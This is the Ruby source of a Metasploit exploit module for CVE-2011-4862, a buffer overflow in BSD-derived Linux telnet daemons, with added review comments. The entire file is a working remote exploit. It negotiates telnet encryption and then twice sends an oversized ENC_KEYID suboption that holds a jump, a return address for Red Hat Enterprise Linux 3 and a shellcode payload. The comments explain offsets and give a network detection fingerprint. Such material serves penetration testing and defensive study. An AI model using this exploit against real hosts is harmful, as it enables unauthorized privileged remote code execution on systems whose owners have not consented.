##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# Brings in Msf::Exploit::Remote and the Telnet / BruteTargets mixins used below
require 'msf/core'
# Metasploit module for CVE-2011-4862: a buffer overflow in the ENCRYPT option
# handler of BSD-derived Linux telnet daemons (inetutils / krb5-telnet).
#
# What goes over the wire (useful as a detection fingerprint): an ENCRYPT
# negotiation (IAC SB 0x26 ...) followed by an ENCRYPT ENC_KEYID suboption
# (IAC SB 0x26 0x07) whose key-id body is 400 bytes long, sent twice in a row.
# A legitimate key id is nowhere near that size.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Telnet
  include Msf::Exploit::BruteTargets

  # Module metadata. Only the RHEL3 target carries a concrete 'Ret' address;
  # the 'Automatic' entry has an empty hash and relies on the BruteTargets
  # mixin to run exploit_target against the concrete targets instead.
  # NOTE(review): that expansion happens in the mixin, not in this file — confirm.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in the encryption option handler of the
        Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions
        use NetKit-derived telnet daemons, so this flaw only applies to a small subset of
        Linux systems running telnetd.
      },
      'Author'         => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-4862' ],
          [ 'OSVDB', '78020' ],
          [ 'BID', '51182' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/18280/' ]
        ],
      'Privileged'     => true,
      'Platform'       => 'linux',
      # Payload lives inside the 400-byte key id starting at offset 120, so
      # 200 bytes is the budget; 0x00 would terminate the string copy early.
      'Payload'        =>
        {
          'Space'       => 200,
          'BadChars'    => "\x00",
          'DisableNops' => true,
        },

      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 23 2011'))
  end

  # BruteTargets entry point, called once per concrete target hash +t+.
  # Negotiates telnet encryption, then sends an oversized ENC_KEYID suboption
  # twice: the first send corrupts a pointer, the second triggers its use.
  #
  # @param t [Hash] target entry; only t['Ret'] (a 32-bit address) is read.
  # @raise [RuntimeError] when no ENCRYPT reply arrives (also raised for a
  #   dropped connection, see the NOTE in the loop below).
  def exploit_target(t)
    connect
    # Hex-escape the banner so control bytes from the server are not rendered
    banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
    print_status(banner_sanitized) if datastore['VERBOSE']

    # Telnet ENCRYPT option bytes (RFC 2946; option code 38 = 0x26):
    #   IAC SB ENCRYPT IS DES_CFB64 CFB64_IV <8 IV bytes> IAC SE
    enc_init      = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
    #   IAC SB ENCRYPT ENC_KEYID  (key-id body follows, terminated by IAC SE)
    enc_keyid     = "\xff\xfa\x26\x07"
    end_suboption = "\xff\xf0"
    # A literal 0xff inside telnet data must be doubled (IAC IAC) or the
    # daemon would interpret it as the start of a command
    penc = payload.encoded.gsub("\xff", "\xff\xff")

    # 400-byte key id; the vulnerable handler does not bound this copy.
    key_id = Rex::Text.rand_text_alphanumeric(400)
    # x86 short jump (EB 76): from offset 2, +0x76 lands on offset 120,
    # which is where the payload is written below
    key_id[0, 2] = "\xeb\x76"
    # Two little-endian 32-bit values derived from the target's 'Ret'
    key_id[72, 4] = [t['Ret'] - 20].pack("V")
    key_id[76, 4] = [t['Ret']].pack("V")
    # Some of these bytes can get mangled, jump over them
    key_id[80, 40] = "\x41" * 40
    # Insert the real payload
    key_id[120, penc.length] = penc
    # Create the Key ID command
    sploit = enc_keyid + key_id + end_suboption

    # Initiate encryption
    sock.put(enc_init)
    # Wait for a successful response: read until the server's
    # ENCRYPT REPLY DES_CFB64 (ff fa 26 02 01) shows up. get_once returns nil
    # when nothing arrives within the 5 s timeout.
    # NOTE(review): the modifier rescue swallows every StandardError, so a
    # connection reset is reported as "does not support encryption" too, and
    # the raise leaves the socket open (disconnect is never reached).
    loop do
      data = sock.get_once(-1, 5) rescue nil
      if not data
        raise RuntimeError, "This system does not support encryption"
      end
      break if data.index("\xff\xfa\x26\x02\x01")
    end

    # The first request smashes the pointer
    print_status("Sending first payload")
    sock.put(sploit)

    # Make sure the server replied to the first request
    data = sock.get_once(-1, 5)
    unless data
      # NOTE(review): this early return also skips disconnect below
      print_status("Server did not respond to first payload")
      return
    end
    # Some delay between each request seems necessary in some cases
    # (select with no descriptors is used as a half-second sleep)
    ::IO.select(nil, nil, nil, 0.5)
    # The second request results in the pointer being called
    print_status("Sending second payload...")
    sock.put(sploit)
    # Hand the connection over to the payload handler, give it a moment,
    # then tear the telnet session down
    handler
    ::IO.select(nil, nil, nil, 0.5)
    disconnect
  end
end